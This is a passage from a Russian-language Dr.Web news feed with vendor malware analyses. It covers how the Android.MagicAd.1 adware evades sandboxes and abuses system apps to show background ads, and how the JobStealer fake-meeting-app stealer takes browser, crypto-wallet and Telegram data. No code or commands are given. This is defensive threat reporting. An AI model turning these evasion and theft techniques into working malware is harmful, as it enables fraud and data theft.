&lt;p&gt;Прежде чем приступить к&amp;nbsp;демонстрации рекламы, троян выполняет ряд проверок, чтобы убедиться, что его окружение является безопасным. Например, он&amp;nbsp;ищет признаки работы в&amp;nbsp;виртуальной среде, проверяет, была&amp;nbsp;ли его установка органической, нет&amp;nbsp;ли IP-адреса зараженного устройства в&amp;nbsp;его черном списке и&amp;nbsp;т.&amp;nbsp;д.&lt;/p&gt;

&lt;p&gt;Если &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;не обнаруживает подозрительную активность, он&amp;nbsp;скрывает свой значок из&amp;nbsp;списка программ в&amp;nbsp;меню главного экрана. Затем он&amp;nbsp;создает канал уведомлений, через который запускает несколько вредоносных сервисов постоянного присутствия, необходимых для работы в&amp;nbsp;фоновом режиме при закрытом окне вредоносного приложения. Далее через планировщик задач &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; создает задание, которое периодически перезапускает сервисы, проверяющие работу канала уведомлений и&amp;nbsp;при необходимости запускающие его вновь. Кроме того, при работе на&amp;nbsp;устройствах с&amp;nbsp;относительно старыми версиями ОС&amp;nbsp;Android троян запускает виртуальный экран, чтобы работа одного из&amp;nbsp;его компонентов не&amp;nbsp;прерывалась системой.&lt;/p&gt;

&lt;p&gt;Чтобы показывать рекламу в&amp;nbsp;фоновом режиме, когда его окно закрыто, &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; применяет ряд методик, выбираемых на&amp;nbsp;основе производителя зараженного устройства. При этом они реализуются без явного запроса системного разрешения &lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;, которое позволяет приложению отображаться поверх других программ.&lt;/p&gt;

&lt;p&gt;Независимо от&amp;nbsp;применяемого способа, все рекламные баннеры загружаются в&amp;nbsp;виде полупрозрачной активности (Translucent Activity), что дает возможность трояну отрисовывать их&amp;nbsp;поверх существующих окон.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;Примеры рекламы, которую демонстрирует Android.MagicAd.1&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;Одна из&amp;nbsp;методик реализуется через намерения (Intent), адресованные другим приложениям. Она позволяет трояну обойти ограничения современных версий ОС&amp;nbsp;Android, не&amp;nbsp;позволяющие программам запускать самих себя. В&amp;nbsp;зависимости от&amp;nbsp;модели зараженного устройства, с&amp;nbsp;помощью этой техники &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; либо сам демонстрирует объявления, либо непосредственно &amp;laquo;заставляет&amp;raquo; целевые программы показывать баннеры с&amp;nbsp;рекламой.&lt;/p&gt;

&lt;p&gt;В&amp;nbsp;одном из&amp;nbsp;вариантов данного способа целью трояна являются:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        браузер Mi&amp;nbsp;Browser на&amp;nbsp;устройствах Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        графическая оболочка Miui SystemUI на&amp;nbsp;устройствах Xiaomi;
    &lt;/li&gt;
    &lt;li&gt;
        лончер Amazon Fire TV&amp;nbsp;Home Screen на&amp;nbsp;устройствах Amazon&amp;nbsp;TV.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Все это&amp;nbsp;&amp;mdash; системные приложения на&amp;nbsp;соответствующих устройствах, поэтому они способны обрабатывать намерения, даже когда не&amp;nbsp;запущены пользователем напрямую. Пока эти программы активны и&amp;nbsp;могут принимать намерения, &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; может использовать их&amp;nbsp;для показа объявлений.&lt;/p&gt;

&lt;p&gt;Стоит отметить, что если Mi&amp;nbsp;Browser установлен на&amp;nbsp;устройстве Xiaomi не&amp;nbsp;как системное приложение, троян также может использовать эту программу для демонстрации рекламы&amp;nbsp;&amp;mdash; до&amp;nbsp;тех пор, пока окно браузера не&amp;nbsp;будет закрыто.&lt;/p&gt;

&lt;p&gt;Когда &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; обнаруживает Mi&amp;nbsp;Browser на&amp;nbsp;подходящем устройстве, он&amp;nbsp;отправляет отложенное намерение для запуска рекламы своему dex-компоненту (детектируется Dr.Web как &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1.origin&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;). Тот формирует из&amp;nbsp;него собственное намерение и&amp;nbsp;передает браузеру, который извлекает исходное намерение и&amp;nbsp;в&amp;nbsp;соответствии с&amp;nbsp;ним запускает рекламу.&lt;/p&gt;

&lt;p&gt;Взаимодействие с&amp;nbsp;двумя другими программами несколько отличается&amp;nbsp;&amp;mdash; они используются для вызова трояна из&amp;nbsp;фонового режима. Вначале &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; отправляет модулю &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1.origin&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; отложенное намерение для запуска рекламы, и&amp;nbsp;тот передает целевым программам собственное намерение для своего пробуждения. Если это приложение Miui SystemUI, оно в&amp;nbsp;ответ отправляет свое намерение для запуска модуля. Если&amp;nbsp;же целевой программой является Amazon Fire TV&amp;nbsp;Home Screen, она запускает модуль напрямую&amp;nbsp;&amp;mdash; по&amp;nbsp;имени его пакета. Получив управление, модуль &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.origin&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; запускает рекламу, которая поступила ему в&amp;nbsp;отложенном намерении от&amp;nbsp;основного вредоносного приложения.&lt;/p&gt;

&lt;p&gt;Если трояну не&amp;nbsp;удается показать рекламу, он&amp;nbsp;пытается использовать этот способ еще дважды, и&amp;nbsp;в&amp;nbsp;случае неудачи пытается показать рекламу напрямую, уже не&amp;nbsp;задействуя отложенные намерения и&amp;nbsp;свой вредоносный dex-модуль.&lt;/p&gt;

&lt;p&gt;Другая вариация этого способа похожа на&amp;nbsp;предыдущую и&amp;nbsp;применяется для эксплуатации программ на&amp;nbsp;устройствах Vivo. Она отличается тем, что запуск рекламы происходит при помощи Android Binder&amp;nbsp;&amp;mdash; системного компонента, обеспечивающего взаимодействие между процессами. В&amp;nbsp;данном случае троян нацелен на&amp;nbsp;следующие системные программы:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager,
    &lt;/li&gt;
    &lt;li&gt;
        Телефонная книга,
    &lt;/li&gt;
    &lt;li&gt;
        Vivo Browser,
    &lt;/li&gt;
    &lt;li&gt;
        Baidu IME Customized.
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; запускает их&amp;nbsp;через Android Binder, отправляя ему обычные намерения через контейнер данных Parcel. Эти программы затем запускают троянский компонент &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.origin&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt;, который после выхода из&amp;nbsp;фонового режима показывает рекламу.&lt;/p&gt;

&lt;p&gt;В&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; также предусмотрено несколько других методик для демонстрации рекламы при работе в&amp;nbsp;фоне, среди них&amp;nbsp;&amp;mdash; использование медиаплеера. В&amp;nbsp;отличие от&amp;nbsp;способов, нацеленных на&amp;nbsp;определенные устройства, этот метод является универсальным и&amp;nbsp;работает на&amp;nbsp;большинстве моделей от&amp;nbsp;различных производителей. &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; расшифровывает из&amp;nbsp;своего тела аудиофайл и&amp;nbsp;сохраняет его в&amp;nbsp;рабочую директорию. Затем вредоносная программа запускает свой экземпляр системного медиаплеера, задает в&amp;nbsp;нем минимальную громкость и&amp;nbsp;связывает его с&amp;nbsp;глобальной системой управления мультимедиа ОС&amp;nbsp;Android. Далее для запуска рекламы &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; устанавливает широковещательный приемник, отслеживающий нажатия в&amp;nbsp;этом плеере. Затем троян при помощи специальной adb-команды имитирует действия пользователя, нажимая в&amp;nbsp;плеере кнопку записи, после чего сразу&amp;nbsp;же закрывает его окно. Нажатие кнопки приводит к&amp;nbsp;срабатыванию системного медиаприемника, который позволяет &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; перехватить управление и&amp;nbsp;запустить рекламу.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space для мобильных устройств надежно детектирует и&amp;nbsp;удаляет все известные версии вредоносной программы &lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, поэтому для наших пользователей она опасности не&amp;nbsp;представляет.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Android.MagicAd.1.origin&amp;lng=uz"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.uz/show/?i=15253&amp;lng=uz</guid><title>Вместо работы — украденные данные и деньги. В поддельных приложениях для онлайн-собеседований скрывается троян-стилер, который атакует пользователей macOS и Windows</title><link>https://news.drweb.uz/show/?i=15253&amp;lng=uz&amp;c=9</link><pubDate>Thu, 07 May 2026 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;strong&gt;Эксперты «Доктор Веб» предупреждают о распространении троянской программы JobStealer, похищающей конфиденциальную информацию у пользователей компьютеров под управлением macOS и Windows. В первую очередь она нацелена на кражу данных из криптокошельков. Мошенники под предлогом проведения онлайн-собеседований заманивают потенциальных жертв на вредоносные сайты, где предлагают установить приложение для видеоконференций. В действительности это ПО — и есть троян JobStealer.&lt;/strong&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Атака начинается с того, что злоумышленники связываются с потенциальными жертвами и предлагают им ту или иную вакансию. Они приглашают пользователей пройти собеседование и предоставляют им ссылки на сайты «платформ» для проведения онлайн-встреч — якобы для подключения к видеоконференции. Эти сайты имеют презентабельный вид, но на самом деле являются мошенническими. С них под видом программы для онлайн-конференций скачивается вредоносная программа JobStealer. При этом киберпреступники используют различное оформление таких интернет-ресурсов, а также меняют имена самой программы. Наши специалисты встречали варианты с названиями MeetLab, Juseo, Meetix, Carolla и другие. В ряде случаев киберпреступники используют названия настоящих сервисов, таких как Webex.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/01_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/02_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Примеры сайтов поддельных сервисов онлайн-конференций, с которых скачивается JobStealer&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Чтобы пользователи поверили, что платформы являются полноценно функционирующими, мошенники создают соответствующие телеграм-каналы и аккаунты в социальных сетях — например, X.&lt;/p&gt;&lt;div class="img img-two-v same-height"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/03_JobStealer.1.png" alt="#drweb"&gt; &lt;/a&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/04_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Для маскировки трояна под легитимное ПО злоумышленники создают видимость активности в социальных сетях&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Для установки программы на устройства с macOS посетителям вредоносных сайтов предлагается две опции:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;скопировать и выполнить в терминале bash-команду, указанную на сайте;&lt;/li&gt;&lt;li&gt;скачать файл образа диска в формате &lt;span class="string"&gt;.dmg&lt;/span&gt; и запустить его.&lt;/li&gt;&lt;/ul&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/05_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Троян JobStealer скачивается с вредоносных сайтов как в виде dmg-контейнера, так и через выполнение bash-команды в терминале&lt;/i&gt;&lt;/p&gt;&lt;p&gt;В первом случае при выполнении команды в терминале из интернета автоматически загружается и исполняется скрипт, который скачивает и запускает исполняемый файл JobStealer (детектируется как&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Mac.PWS.JobStealer.1&amp;lng=uz"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;&lt;p&gt;Во втором случае предлагаемый к загрузке dmg-образ изначально содержит указанные выше файлы. При монтировании он демонстрирует инструкцию по «установке» приложения. В ней указано, что пользователю необходимо открыть терминал и перетащить в его окно прилагаемый скрипт. На самом деле вместо установки ПО для видеоконференций скрипт запустит троянский файл.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/06_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Изображение с инструкцией, которое демонстрируется при открытии файла образа с трояном JobStealer&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.uz/search/?q=Mac.PWS.JobStealer.1&amp;lng=uz"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;представляет собой исполняемый файл-контейнер в формате Fat Mach-O и содержит двоичный код сразу для нескольких процессорных архитектур — x64 и arm64. В зависимости от платформы зараженного компьютера при запуске трояна автоматически задействуется компонент, соответствующий целевому процессору.&lt;/p&gt;&lt;p&gt;Отметим, что существуют различные версии&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Mac.PWS.JobStealer.1&amp;lng=uz"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;. Более ранние варианты вредоносного приложения не поддерживали работу на компьютерах Mac с архитектурой arm64. В них также отсутствовала обфускация — ее вирусописатели начали добавлять и усиливать по мере обновления стилера.&lt;/p&gt;&lt;p&gt;После запуска&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Mac.PWS.JobStealer.1&amp;lng=uz"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;демонстрирует фишинговое окно, где сообщает о якобы возникшей ошибке в работе. Для ее «исправления» вредоносная программа просит пользователя указать пароль от его учетной записи.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/07_JobStealer_app_error.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Фишинговое окно, в котором запрашивается пароль от учетной записи пользователя Mac&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Далее&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Mac.PWS.JobStealer.1&amp;lng=uz"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;собирает следующие данные:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;версию операционной системы и идентификатор компьютера;&lt;/li&gt;&lt;li&gt;данные порядка 300 браузерных расширений-криптокошельков, установленных в целевых браузерах на базе Chomium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, CocCoc);&lt;/li&gt;&lt;li&gt;файлы cookie из этих браузеров;&lt;/li&gt;&lt;li&gt;пароли, а также данные банковских карт, сохраненные в браузерных списках автозаполнения форм;&lt;/li&gt;&lt;li&gt;файлы мессенджера Телеграм из директорий &lt;span class="string"&gt;/Library/Application Support/Telegram Desktop/tdata&lt;/span&gt; и &lt;span class="string"&gt;/Documents/temp_data/Apps/Telegram&lt;/span&gt;, где хранятся сессионные ключи авторизации, загружаемые файлы и т. п.;&lt;/li&gt;&lt;li&gt;пользовательские заметки из нативного для macOS приложения Notes;&lt;/li&gt;&lt;li&gt;наличие в системе приложений криптокошельков Ledger Live и Trezor Suite.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Эти данные помещаются в ZIP-архив и загружаются на C2-сервер.&lt;/p&gt;&lt;p&gt;Вирусописатели также подготовили версию трояна JobStealer и для компьютеров под управлением ОС Windows. Его функциональность аналогична версии для macOS. Кроме того, на некоторых вредоносных сайтах, распространяющих стилера, предусмотрены разделы для загрузки приложения на другие популярные операционные системы. Однако на данный момент наши вирусные аналитики не зафиксировали их распространение. Например, кнопка загрузки программы для ОС Linux либо неактивна, либо ведет на Windows-версию трояна. А в разделах для скачивания программы для устройств на базе iOS и Android говорится, что эти версии находятся в разработке. При этом нельзя исключать, что злоумышленники в дальнейшем начнут распространять варианты трояна и для данных платформ.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Вредоносные сайты потенциально могут распространять версии трояна JobStealer для Linux, iOS и Android&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Все известные модификации вредоносного приложения JobStealer надежно детектируются и удаляются антивирусными продуктами Dr.Web Security Space для macOS и Windows и не представляют угрозы для наших пользователей. Распространяющие трояна мошеннические сайты добавлены в базу нерекомендуемых и опасных ресурсов и также блокируются Dr.Web.&lt;/p&gt;&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;&lt;p&gt;Мы проанализировали вредоносную программу JobStealer по фреймворку MITRE ATT&amp;amp;CK®, который представляет собой матрицу с описанием тактик и техник киберпреступников, атакующих информационные системы. В результате были выявлены следующие ключевые техники:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Этап&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Техника&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Выполнение&lt;/td&gt;&lt;td&gt;&lt;p&gt;Выполнение с участием пользователя (T1204)&lt;/p&gt;&lt;p&gt;Вредоносное копирование и вставка (T1204.004)&lt;/p&gt;&lt;p&gt;Вредоносный файл (T1204.002)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Обнаружение&lt;/td&gt;&lt;td&gt;Обнаружение файлов и каталогов (T1083)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Сбор данных&lt;/td&gt;&lt;td&gt;&lt;p&gt;Автоматизированный сбор (T1119)&lt;/p&gt;&lt;p&gt;Данные из локальной системы (T1005)&lt;/p&gt;&lt;p&gt;Учетные данные из хранилищ паролей (T1555)&lt;/p&gt;&lt;p&gt;Связка ключей (T1555.001)&lt;/p&gt;&lt;p&gt;Учетные данные из браузеров (T1555.003)&lt;/p&gt;&lt;p&gt;Перехват вводимых данных (T1056)&lt;/p&gt;&lt;p&gt;Перехват ввода в графическом интерфейсе (T1056.002)&lt;/p&gt;&lt;p&gt;Архивация собранных данных (T1560)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Организация управления&lt;/td&gt;&lt;td&gt;Веб-служба (T1102)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Эксфильтрация данных&lt;/td&gt;&lt;td&gt;&lt;p&gt;Автоматизированная эксфильтрация (T1020)&lt;/p&gt;&lt;p&gt;Эксфильтрация по каналу управления (T1041)&lt;/p&gt;&lt;p&gt;Эксфильтрация через веб-службу (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;p&gt;Подробнее о&amp;nbsp;&lt;a href="https://vms.drweb.uz/search/?q=Mac.PWS.JobStealer.1&amp;lng=uz"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.uz/show/?i=15061&amp;lng=uz</guid><title>«Доктор Веб»: обзор вирусной активности в III квартале 2025 года</title><link>https://news.drweb.uz/show/?i=15061&amp;lng=uz&amp;c=9</link><pubDate>Wed, 01 Oct 2025 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 октября 2025 года&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;
    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Согласно статистике детектирований антивируса Dr.Web, в III квартале 2025 года общее число обнаруженных угроз снизилось на 4,23% по сравнению со II кварталом. При этом количество уникальных угроз увеличилось на 2,17%. Чаще всего на защищаемых устройствах обнаруживалось нежелательное рекламное ПО, рекламные трояны и вредоносные скрипты. В почтовом трафике преобладали вредоносные скрипты, бэкдоры, и различные троянские программы, такие как загрузчики, дропперы и похитители паролей.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
    &lt;p&gt;Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;